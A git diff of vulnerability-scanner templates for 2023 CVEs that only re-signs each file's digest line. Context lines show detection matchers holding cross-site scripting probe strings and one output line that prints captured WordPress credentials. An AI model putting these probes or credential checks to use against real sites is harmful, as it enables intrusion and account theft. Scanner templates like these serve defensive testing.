condition: and -# digest: 4b0a00483046022100854b6eedcf29b9f4407257626ca8289e18e931c840b7de9f4b781403aa4f3a30022100feffcad1c0d953b462a696ee3037425fdf8f9135d309379ed44a08c874fc6607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022027bbbb37fc821c50655b071bef1a2bf081ddc50fb8473bae86f68d983d389ad7022009ffe3bc97a7e6c05d11866250e415c88d3a2c321554737feb16f1ccb2d50a6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index 4348a5cf2b..6e6f180d4f 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -51,4 +51,4 @@ http: - contains(interactsh_protocol, "dns") - contains(body, "ColdFusion documentation") condition: and -# digest: 4b0a0048304602210082b4c6e19acbd6bc2d2776e029a0c8543657d42b874ca648fef7b0cf47d5dd43022100d87b306d094f7b7d7be74eb279feb8df0607d5454f6bf71f832f9259e2297d75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220231dfa335a027f270199925553ccb0928bc3b01871e5736ba629f40ad0ebb75c0220406e03fdb933e233d4a74fd3259905198f64755be40f8d47debe0308ee6589ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index 1e5f64ba57..4fe89549c6 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -63,4 +63,4 @@ http: - Email - IsSiteAdmin condition: and -# digest: 4a0a00473045022100a58b5e92e169683723b78b9760e3fad647f399485f44d9584acd92634703bd4002207541b9a7ffa8755cb4b72e225027d86fd2dfccaae6168bf6e3428abcdad5ef60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203e666a0b9715202ee359d1fd474d260eda571d7d312dab6ba7de3a0a4b308a3602206ee8a80fa4e39d57247a3ec6b3a19b05b62f7c67683f1f74b42ff6efa0721df2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29439.yaml b/http/cves/2023/CVE-2023-29439.yaml index 387586c233..b02f5ffa0d 100644 --- a/http/cves/2023/CVE-2023-29439.yaml +++ b/http/cves/2023/CVE-2023-29439.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051404fd5879c74f26f3e3d20328728775676899601fe56240a8c3865b521c780022100c0508c953de3425517b071c0abbd29036e2b125ba1af7a21b20557e1107caf9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203a35033a9084161b8e269f87a994abd179878f15d72253d472fb749ac232026b022100efc52768b3bbb3b843a30408c2efa8845dd476bfb311d1d56ca5b5899f15218a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2948.yaml b/http/cves/2023/CVE-2023-2948.yaml index 7796934275..74721e7b72 100644 --- a/http/cves/2023/CVE-2023-2948.yaml +++ b/http/cves/2023/CVE-2023-2948.yaml @@ -40,4 +40,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "list_id: 1}});}}alert(document.domain);", "select at least one Provider", "Save")' condition: and -# digest: 490a0046304402201f348c1ad965519aec601dea4e3594a4203bb91d9386861d1e29e43cfc7f69de02206a1be3fef962ba9fa56678781c5c622f895d192dac29bdfc696cee29e7e75608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7cadcbcaa1a7665229854ebaa4d08fcf1f2b6fb6a15908df680b2d446b0b86202210083954a6783e65764efc3588e55d8ea452bf55242625f493136254ed1883cffd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29489.yaml b/http/cves/2023/CVE-2023-29489.yaml index 291dba12ef..2e81f35956 100644 --- a/http/cves/2023/CVE-2023-29489.yaml +++ b/http/cves/2023/CVE-2023-29489.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 400 -# digest: 4a0a0047304502200544d1f287ef41ae3cf088e290845e98c86d059cde854153d5728b086b85bdfd022100a7c78b65dd8998d0e467a3f16f1088a53834df949f7eb311ad454545bb94a924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008376e46452318581c50834298bceb24539a0418601492e3ae72e6904f41fc18a0221009541094acf9e27d674a191eca9493d663d23bb9ce30b468cd40a06c56d1e0196:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2949.yaml b/http/cves/2023/CVE-2023-2949.yaml index 8a280e65d8..e52254663d 100644 --- a/http/cves/2023/CVE-2023-2949.yaml +++ b/http/cves/2023/CVE-2023-2949.yaml @@ -38,4 +38,4 @@ http: - 'contains(header, "text/html")' - 'contains_all(body, "", "openemr")' condition: and -# digest: 4a0a004730450220108fa66c2cdc6c8b7680bd5104e88e717b840d2571b4c6ad031c039f4eb9ccd6022100b75192c2cd5ddb7e9874af2830784c6516ea54684cde65e41b82e565b835337a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f50082774b8a04fe0da88764e4cf37faa12f335b2161b2c5a4f8cfc8a07243e0220618e372046f1e82da6220c6a51af3312cf3bd8be2acdd8d3a99c1768bbb5bf9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29622.yaml b/http/cves/2023/CVE-2023-29622.yaml index e17ed58564..1449ca693b 100644 --- a/http/cves/2023/CVE-2023-29622.yaml +++ b/http/cves/2023/CVE-2023-29622.yaml @@ -47,4 +47,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"incorrect")' condition: and -# digest: 4a0a0047304502205d36519b2b9f835993cdd262417eb59d35354c534b521ef5fb2370a1c458c9a8022100c1e191f5a47e74a627e434f122480e556641bbcac52be4eb662700639ef081a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205279b241ecf32df15ffa523a7a164a86fb770d7bdac0be256ffd4930452d13f5022100d4cc576894eab1b14574b357ab4f365e85a04c865af32e12d28f03751d468c34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29623.yaml b/http/cves/2023/CVE-2023-29623.yaml index fc3fca33d9..cf869b7479 100644 --- a/http/cves/2023/CVE-2023-29623.yaml +++ b/http/cves/2023/CVE-2023-29623.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022019bdab29e51dac4ed47397495129a499977a1bcca1b6f4aa9fb44263cd1fd6e102210085a75d4c523c5f312ddc0094d76eadb0df067f909c152ea57a61f08803e30f00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc71821162025f268ee5de222f4750561754c1016a473fd7d517ef248346aab3022100ac4cfc3d8539f0cf3e45603921ce9c36ebc9d9bc6791db60bf92773225d50f51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 02789b70ce..1e17136867 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100afeced594594dd08a04c07ba80120871493fa8c243e6b0ef758019f4c205e85b02200230f234069d1a181ab48796a446082f79a84ea10df897f4a908d19937430551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c28840dd8c5d877ad17fee5a4648ac22eb280a8543450e50cb4787c1ee46b1a022100b8173ae2b3d38dadfb44dc8dc366e496b370d100b05b48f88dd3aa2099f80896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index dd030fe1a8..191862087f 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -45,4 +45,4 @@ http: part: body words: - "You are viewing page number" -# digest: 4b0a00483046022100d7ea0d1d7ce9e00af5998f5fa4b5960a70b471e26ecf0caf0577424bace640e0022100ba8f5c9f03136d87aa25b2eab3b136501334d2a57e61dbf0d049f384be7946e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b0d567d7b052cf62884dfcdc0e21acfb8536feb3229ec67fe84d1c196e98d1802202c527d6fcfe222cfe243a865c16f552f10e595e0539804f9d3bf191a972b7e1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29887.yaml b/http/cves/2023/CVE-2023-29887.yaml index 19915b1819..0d4b60c14e 100644 --- a/http/cves/2023/CVE-2023-29887.yaml +++ b/http/cves/2023/CVE-2023-29887.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a6a10d91f4e2d28dc442dc69d39787fca8f48d3665e1aa5b7302f46d7e64adb50221008092f2e0bfd73056671fafbd4c51267037ee1b7dc14bb039da07d3cc9d932712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005705319fbc90464db11a2808fdf787408f2afac55b623fd0b9f8762003f871b022100a345f4f918983f4b23c2b0d88e62b9122872ebcaa97b2632ade1ce647c182003:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index c13b61d3fb..c6f2618ba2 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fd7ddf822741cbb8cb540da455a368436390b59002c7d45d86ff3b215e5c0031022100b790118b57ec90b22542dd1430c2322ddd5a973995928cadab5c6ead98895a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200222f56a5044bb3a018ef5451cbc61aa44e58341f8e85b5120fba2332dc8a57b0220349c5a2c3e0ac6778bf1d3344349a0b06dad52bbf12d4fb0534ecd56b3bad6f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29922.yaml b/http/cves/2023/CVE-2023-29922.yaml index 481b36b276..67ff1e908b 100644 --- a/http/cves/2023/CVE-2023-29922.yaml +++ b/http/cves/2023/CVE-2023-29922.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bfbf1a8c87f9cb5f380257f32742fe3fbfc2ca545f5b61c3df52cb89048fb3b6022100a84526343d726f724f54e529c4771d5ee2037c66a32041da550cb9f158ef4fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e941ced09ce8917e972560b5828553b40a72918b13273cc08f4f262919ae16e8022100c1576c24d5b7aa9f220ae12b1eac49850b3f6fc175c608150d0f1351110a9b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29923.yaml b/http/cves/2023/CVE-2023-29923.yaml index d583d153f9..24a9d83dcb 100644 --- a/http/cves/2023/CVE-2023-29923.yaml +++ b/http/cves/2023/CVE-2023-29923.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022032e5f7965419954c1523bd95cc68756e7f62b769f31076e1ff2e08194e254dc30221008f9246b5ee4e77f13e735e7b0b05b95259fcc150a4197f844348b56a200d8160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008b18b847db968082c86449021bb14ed029390e8de0a2accc64eaa62424f94750221009691a1cb12ea29b0fbc1ede7da1a63f955ec6af74157a14bc83cc16989e1e410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30013.yaml b/http/cves/2023/CVE-2023-30013.yaml index 7b305e3445..ce7f0f190a 100644 --- a/http/cves/2023/CVE-2023-30013.yaml +++ b/http/cves/2023/CVE-2023-30013.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de27474750e6704be6c10312547cdcae9d5fe1ef0ebb3501e7c8578e86e08d04022079ec35ddfb361ca3c6a39ed726e6e93da9077976851ec3bbff7a43e4204a5fdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f4324b8d2cb69442b92a26914965f4d748dc23f82bbc7b0b14fd9b2859ce056022100842c47e8155cd53ac8552440f6d1e5980f0732976cacdb7a5c3b269793f26300:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30019.yaml b/http/cves/2023/CVE-2023-30019.yaml index d6e7cfa5b3..870bfd5717 100644 --- a/http/cves/2023/CVE-2023-30019.yaml +++ b/http/cves/2023/CVE-2023-30019.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 422 -# digest: 4b0a00483046022100f3383f2fbe7492efe4c31cc6431f25c5c5452d34e74b93108f7c4b44ed91fdd40221009ac4be31a0cff9f9737fcf1893fa400e0933a2863cec4612c7640ea4081d6c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a4c72352b5a278fe9fe14d659d3e7eca5ceeff07f6a2cdae1fb97ac844bc66da02201d4636487109429fb610844b1c7d86e88b9231569dc4c3d0483183c083d3c341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index f7aff3b56b..0abb5d4f6c 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -47,4 +47,4 @@ http: - 'duration_2>=6' - 'contains(tolower(response_1), "prestashop")' condition: and -# digest: 4a0a0047304502204f8f5546a345ebd6679d7326c8be4fdd9b4634f7da41d4e2a2371aa32354f8eb0221009d47704569e5ce942252fde8c0426bb71442d5f994d5aba7fb3f593b0e865e0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b46183e33550da37ab7121e63b0622beb705ae54ab98563678cad4f92a273dec022100f6a8e4c8d114c476ea6f14bc62d7ebad0a6dbcaa64328c6f3f939d38b044bcb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30210.yaml b/http/cves/2023/CVE-2023-30210.yaml index 50a5e1519b..a57620de22 100644 --- a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210084018e298a44acee3c2d3eb1556a8f01d7bf0139042553405d0073a774a97c48022057112439e4e35da6bbcb04cd8784377c767d0926a15aaac91a851caa83703256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e51be3a217490c7c4de70ac04fb0b0431a51b8fac4ffa6d6639ca0e89b4e0e30022100af07b85973c4cb21873160e102defa8952df672fd3dcbe651fe48656e79e23c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 2189a95c4e..5dd436dbcd 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220634ca8a4ffd62bcb105aa07c8ed88c6b4c618002ce8971aed027cc69314c0293022100fcef9a2e98705ea6414ef80562a5b57e55c0340f6d7cf6020b1361769ebd8faa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c32a30b9bc28b78bb36d839cac2ff6aa2f71f4a2ab78de882a2479cd3d7373f9022100ae591bbcff8497cc91817ed216fae39f7a9191562cdfb7884378410f8f221d8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index c934e88c87..1fb78a3c0b 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100912b0803a7e5455d57a52707fe3ca217b6ce59f4cb312a7d20d93ed4d511c02c022004941e8d87c4edc496584e35ce2e3b2e5d1ce821828c03985db9ac734c6a4733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220299c58ac9d6a22e1c49ef45f97057ebad174785e1ec42d9b942926d1a73e5dca022100a786b9078630f2acbfe99f890a7fc9e4f487ab208a16be633daefac19163d791:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30258.yaml b/http/cves/2023/CVE-2023-30258.yaml index 8566de4134..04e479bc8f 100644 --- a/http/cves/2023/CVE-2023-30258.yaml +++ b/http/cves/2023/CVE-2023-30258.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022049027c19b0bf6f58b9b44aab3c55056e970467a85cc9e82b6a50722567aa4c0e02203a12757fe04db9aefaac1ade55009e909a82de1087a9ab7aa8d6511dd928d259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a071fe2d4bc54efa5a79cba38c20d2fcd7bb69536fc983c156b52ca187615775022079222e249bf01f2e55a560999af2aaf0c538e1a05be8152114ca492a3deffbbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30534.yaml b/http/cves/2023/CVE-2023-30534.yaml index 317126eea6..dd6a3dacd1 100644 --- a/http/cves/2023/CVE-2023-30534.yaml +++ b/http/cves/2023/CVE-2023-30534.yaml @@ -76,4 +76,4 @@ http: regex: - "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]" internal: true -# digest: 4a0a0047304502207e107d63a92d437ea36fe3294ee12e5e23017f45c92427efb8ee2876d98f02bd022100b41521b425d00033c913385c3408da3b9ca4037df233817fb2d91c500620317f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b87815b376eff87b8e81df4dbc125c91882942b0ba9bb3eb743effb574e34d0302206611b8e3bd562e81d0122a40bb24d240ddbf05ace217f252d72d48bdb2998b83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index cb4d80cec2..cb4ebf0d18 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100a271284d69cac1f4f872b9bff6588e356c8648cf640264b5606b808c55a3cfbd022100fb26ec06577c0fb74a98f0ba3f0cb1fda60beb381bb735d688514022df6bf3ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022021267676d2b0caf3b0abf2b1ad002c1b21aeb900af8aaf1da1431254edcfd2b40221009713d87ebfdea3a87e6e930de7a2d321010abf8c53a1dd14b45af1012c89bd02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index 6db19106f8..d7a59891b9 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -55,4 +55,4 @@ http: - 'duration>=6' - 'status_code == 200' condition: and -# digest: 4b0a00483046022100c0dcbeb57b4e99aa73a40a91cba812a27203182bca95ab6b14d25f64a6a6cedc022100f9d201151cf04d6e74c390f8a539f56663322adfec3fd01c59b4a895a124695f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b510c150d2e6cf0b4697b44beac3cd589f45d6b26e082db5fb5a9c09303736450220465ca9ff102223548c23048a8590c767a10c739760ab78088e6b4aa5471d3cb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index ea14897000..719894083f 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Advanced Custom Fields")' condition: and -# digest: 490a00463044022056850f415fae2d0929dad93fe10665c4ffa3942c147dfc81c7ebf791f92ac5b50220214d9094cddb98c12f33f8027ead5c1b1977b3ac248e35474df4173260e464fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203519c9cc80a50590dae099f69444e784bec905dbd3d0cfd0444fb1ef60816d1f02204fe21213712048f52f207ad3a25a4f50937bf470a0ad505e3c872ebe10b77193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml index b5a5248335..9a372736b1 100644 --- a/http/cves/2023/CVE-2023-30868.yaml +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -47,4 +47,4 @@ http: - 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")' - 'status_code_2 == 200' condition: and -# digest: 4b0a00483046022100be09a7bfdcc1497edc43924eab1f4067bcaa9567f68893d5408a9fecf5225de302210082881da0e9b08085c550a7bba75ab651b42f223287c1dd66731cf28ebd69b507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220190481a719136316c9ba89f9f2939e193e19bd3ed466d8d7e2e0a1c8d83f4eab0221009305805e4a7c444a33913a5937a05df99836aebb8cbe484b636680272ddbde7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 70421c8cae..8aa13ee98e 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -80,4 +80,4 @@ http: regex: - 'name="logintoken" value="([a-zA-Z0-9]+)">' internal: true -# digest: 4b0a004830460221008f298a6e3c9630e270f965e1eb76ad282dc1013c066ba86b81ca984e5c759221022100b3cadd4c5e1edc8028ee6372aa7c634e053893e68cee34de8fdc2e8ce44c75cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100828b6422250d2f0eacad42dfc9ff5b621925a0ab9d28201028af494122f7bfb1022100f3cc921066d9381b2950d12a50afc826e89e0f2e75e88beb79a203e155006b23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index c71f0a5eee..cecedd05b2 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022037988cb94ec5fefe05f0dd589b9f27b78e4d9b73921069ebaccb42a00135ca7a02200fd647168e28fb0e37753bdd00a50dcf4ac7cb131ef5a7dce28ad22f8220aa9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be68b55db3ad67605b5ce4332184521018201647893335d9470193350f1834ac022100ffc9632c452c6b140662e7de2b32f211f15c2ac980d78a100a02880909a73a00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index df4af1a7a0..334dc611e5 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -45,4 +45,4 @@ http: - type: regex regex: - "^OK$" -# digest: 4a0a00473045022100a8303b0cd10a64a26c1017b52482339440bbe857e22361f8d58e29bed65bc03302205340556a2173736013f81b1ad2bfa44459a577ac9e4ee71bbf10a5f1917725bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b412c7a9620de402b8322d4bbe35449064130bda28901dc50fd28f2a54b930960220306ddf4ede99885b0a0aa2d242b0f239a1b4fd44810791fc73d706723914f12e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index 809e10ea89..fde0e95710 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -42,4 +42,4 @@ http: part: body words: - '{"seriesID":' -# digest: 490a0046304402201eb69dd460edd54d047f99e7c17e6536f36af9d8c7d2154a6c83cbd7fc8c268a02202960f6694f51f8c7d773f12ee9e40deabe3a8b55921acfe988226be8aa75dfc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022062b6e0c0530f09a4fb5d82a488bb5a9b8c30e17a30cbf0322716f416f5cd2bc902207130d6f8d9a489b594915a4459ad3e54c7ea4415774bb7b9b5b08f0654747fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 1931ca6ce2..1bc2341040 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "onfocus=\"alert(document.domain)\" autofocus=\"\">")' - 'contains(body_2, "ChurchCRM")' condition: and -# digest: 4a0a004730450221009a02aa59a6a1236d95d032bfb4241ced35bf26029952519fd2031904e69f134f0220414be6fa3a6f964f5e9e9c9a3d99939b24c5d7d95a3315a4eda5b29f923afc61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7a5e13d5c7dc991bd7a56540690cd04e964d143cb0cb207bafa4b40056f7078022100a0dd45c4c270376c10d96a5ce999d8e6774ad21ce9423a7eb28770710358e9d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml index f901dafa16..b79fc1eb82 100644 --- a/http/cves/2023/CVE-2023-32077.yaml +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -38,4 +38,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")' condition: and -# digest: 490a00463044022044db0025b30ee01f7b653b83140795eaf85cb6c5037c5f592c309666b0191a660220208862f3f2eb0ddb3dcc357a3c4811cc439136e6f123760564c5c0cf2f9274ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022022bb6a32bbe67ce63f09a569ea77dbc532a426bb9ee2a6e51aceb5faf05842a40220632654660f5d4f4a8430ed0af848009258f9b5297792356180d1c9f6dfca60d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index d5ae54008e..a8fc161f17 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de57a10bfb7f4faa9acd530eede927372fc258914a5d1f5fa476a9317bea80db0220635e62864d2ab58097102400c7516d610bdd42516cbb280f12aab1e009a3b21b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015d82fb8acb7bfa5aef151775c007ac7392755232b3b58e59c3691a6719c2f76022100d6ddfb3d581b73eeae01ec24e9fd1bc7148176fd2e0936619bb5b8089a442dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index a1ddc1903f..5fac83ca7a 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -108,4 +108,4 @@ http: - type: dsl dsl: - '"WP_USERNAME: "+ wordpress_username + " WP_PASSWORD: "+ password' -# digest: 4a0a00473045022100a26b83d631646ec09af3af65eb293c9a3f3761a84afecbfca21c5e8f0973d6fe022064a99db818cef379e23b844ee31a73da1796fdad71351add8163625aaf7e6a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d9afa0d68b07694175c57ad8f7b5388a4b0ad0ec1f92993ad5ec4a15dd38e5ef022100bafc6ce6e931ccb821730c75059d98cbee26f3827f8fa6541ed7ed0884abacbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 7c82376fb8..30e6b9c68f 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202de73ede6c782fa2e7558f120af51ccdb43e6a834f0cb11b796ac10f14abf745022068858456f26584ae6b4d402af1069998db1db3a842d77a00531bafc642d74867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b8a2187eee029f0b7de9882ee0c9c883e781051896f19ca21d4a0a64281583d5022100e889424a42a8a9f8303d12b5e470510e2240db26e1798ffb17a30377a3545aa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 3b8370abe5..03d2a62bd3 100644 --- 